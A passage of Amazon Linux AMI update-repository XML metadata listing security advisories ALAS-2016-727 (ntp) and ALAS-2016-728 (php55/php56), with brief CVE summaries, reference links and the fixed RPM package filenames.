name="kernel-debuginfo" version="4.4.15" release="25.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.4.15-25.57.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.4.15" release="25.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.4.15-25.57.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.4.15" release="25.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.4.15-25.57.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.4.15" release="25.57.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.4.15-25.57.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.4.15" release="25.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.4.15-25.57.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.4.15" release="25.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.4.15-25.57.amzn1.i686.rpm</filename></package><package name="perf" version="4.4.15" release="25.57.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.4.15-25.57.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.4.15" release="25.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.4.15-25.57.amzn1.i686.rpm</filename></package><package name="kernel" version="4.4.15" release="25.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.4.15-25.57.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.4.15" release="25.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.4.15-25.57.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.15" release="25.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.4.15-25.57.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.4.15" release="25.57.amzn1" 
epoch="0" arch="i686"><filename>Packages/kernel-tools-4.4.15-25.57.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.4.15" release="25.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.4.15-25.57.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.4.15" release="25.57.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.4.15-25.57.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-727</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-727: medium priority package update for ntp</title><issued date="2016-08-01 13:30:00" /><updated date="2017-01-04 14:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-4956:
ntpd in NTP 4.x before 4.2.8p8 allows remote attackers to cause a denial of service (interleaved-mode transition and time change) via a spoofed broadcast packet. NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-1548.
1340860:
CVE-2016-4956 ntp: broadcast interleave (incomplete fix for CVE-2016-1548)
CVE-2016-4955:
ntpd in NTP 4.x before 4.2.8p8, when autokey is enabled, allows remote attackers to cause a denial of service (peer-variable clearing and association outage) by sending (1) a spoofed crypto-NAK packet or (2) a packet with an incorrect MAC value at a certain time.
1340858:
CVE-2016-4955 ntp: autokey association reset
CVE-2016-4954:
The process_packet function in ntp_proto.c in ntpd in NTP 4.x before 4.2.8p8 allows remote attackers to cause a denial of service (peer-variable modification) by sending spoofed packets from many source IP addresses in a certain scenario, as demonstrated by triggering an incorrect leap indication.
1302225:
CVE-2016-4954 ntp: partial processing of spoofed packets
CVE-2015-8139:
1300654:
CVE-2015-8139 ntp: ntpq and ntpdc disclose origin timestamp to unauthenticated clients
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8139" title="" id="CVE-2015-8139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4954" title="" id="CVE-2016-4954" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4955" title="" id="CVE-2016-4955" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4956" title="" id="CVE-2016-4956" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ntp" version="4.2.6p5" release="41.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-4.2.6p5-41.32.amzn1.x86_64.rpm</filename></package><package name="ntp-doc" version="4.2.6p5" release="41.32.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-doc-4.2.6p5-41.32.amzn1.noarch.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="41.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-debuginfo-4.2.6p5-41.32.amzn1.x86_64.rpm</filename></package><package name="ntp-perl" version="4.2.6p5" release="41.32.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-perl-4.2.6p5-41.32.amzn1.noarch.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="41.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntpdate-4.2.6p5-41.32.amzn1.x86_64.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="41.32.amzn1" epoch="0" arch="i686"><filename>Packages/ntpdate-4.2.6p5-41.32.amzn1.i686.rpm</filename></package><package name="ntp" version="4.2.6p5" release="41.32.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-4.2.6p5-41.32.amzn1.i686.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="41.32.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-debuginfo-4.2.6p5-41.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" 
author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-728</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-728: medium priority package update for php55 php56</title><issued date="2016-08-01 13:30:00" /><updated date="2016-08-17 13:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5773:
1351179:
CVE-2016-5773 php: ZipArchive class Use After Free Vulnerability in PHP's GC algorithm and unserialize
CVE-2016-5772:
1351175:
CVE-2016-5772 php: Double Free Corruption in wddx_deserialize
CVE-2016-5771:
1351173:
CVE-2016-5771 php: Use After Free Vulnerability in PHP's GC algorithm and unserialize
CVE-2016-5770:
A type confusion issue was found in the SPLFileObject fread() function. A remote attacker able to submit specially crafted input to a PHP application which uses this function could use this flaw to execute arbitrary code with the privileges of the user running that PHP application.
1351171:
CVE-2016-5770 php: Int/size_t confusion in SplFileObject::fread
CVE-2016-5769:
1351070:
CVE-2016-5769 php: Integer Overflows in mcrypt_generic() and mdecrypt_generic() resulting in heap overflows
CVE-2016-5768:
A double free flaw was found in the mb_ereg_replace_callback() function of php, which is used to perform regex searches. This flaw could possibly cause a PHP application to crash.
1351168:
CVE-2016-5768 php: Double free in _php_mb_regex_ereg_replace_exec
CVE-2016-5767:
An integer overflow, leading to a heap-based buffer overflow, was found in the gdImagePaletteToTrueColor() function of PHP&#039;s gd extension. A remote attacker could use this flaw to crash a PHP application or execute arbitrary code with the privileges of the user running that PHP application, using gd via a specially crafted image buffer.
1351069:
CVE-2016-5767 gd: Integer Overflow in gdImagePaletteToTrueColor() resulting in heap overflow
CVE-2016-5766:
An integer overflow, leading to a heap-based buffer overflow, was found in the imagecreatefromgd2() function of PHP&#039;s gd extension. A remote attacker could use this flaw to crash a PHP application or execute arbitrary code with the privileges of the user running that PHP application, using gd via a specially crafted GD2 image.
1351068:
CVE-2016-5766 gd: Integer Overflow in _gd2GetHeader() resulting in heap overflow
CVE-2016-5385:
It was discovered that PHP did not properly protect against the HTTP_PROXY variable name clash in a CGI context. A remote attacker could possibly use this flaw to redirect HTTP requests performed by a PHP CGI script to an attacker-controlled proxy via a malicious HTTP request.
1353794:
CVE-2016-5385 PHP: sets environmental variable based on user supplied Proxy request header
CVE-2015-8874:
Stack consumption vulnerability in GD in PHP before 5.6.12 allows remote attackers to cause a denial of service via a crafted imagefilltoborder call.
1336772:
CVE-2015-8874 gd: gdImageFillToBorder deep recursion leading to stack overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8874" title="" id="CVE-2015-8874" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5385" title="" id="CVE-2016-5385" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5766" title="" id="CVE-2016-5766" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5767" title="" id="CVE-2016-5767" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5768" title="" id="CVE-2016-5768" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5769" title="" id="CVE-2016-5769" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5770" title="" id="CVE-2016-5770" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5771" title="" id="CVE-2016-5771" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5772" title="" id="CVE-2016-5772" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5773" title="" id="CVE-2016-5773" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-odbc" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package 
name="php55-mssql" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.38" release="1.116.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php55-mbstring-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package 
name="php55-common" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.38" release="1.116.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.38-1.116.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.38" release="1.116.amzn1" epoch="0" 
arch="i686"><filename>Packages/php55-odbc-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.38" 
release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.38" release="1.116.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.38-1.116.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.24" 
release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.24" release="1.126.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-embedded-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package 
name="php56-mcrypt" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.24" release="1.126.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.24-1.126.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.24" release="1.126.amzn1" epoch="0" 
arch="i686"><filename>Packages/php56-intl-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-cli" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-cli-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-mbstring" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mbstring-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.24" release="1.126.amzn1" 
epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-process" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-process-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.24" release="1.126.amzn1" 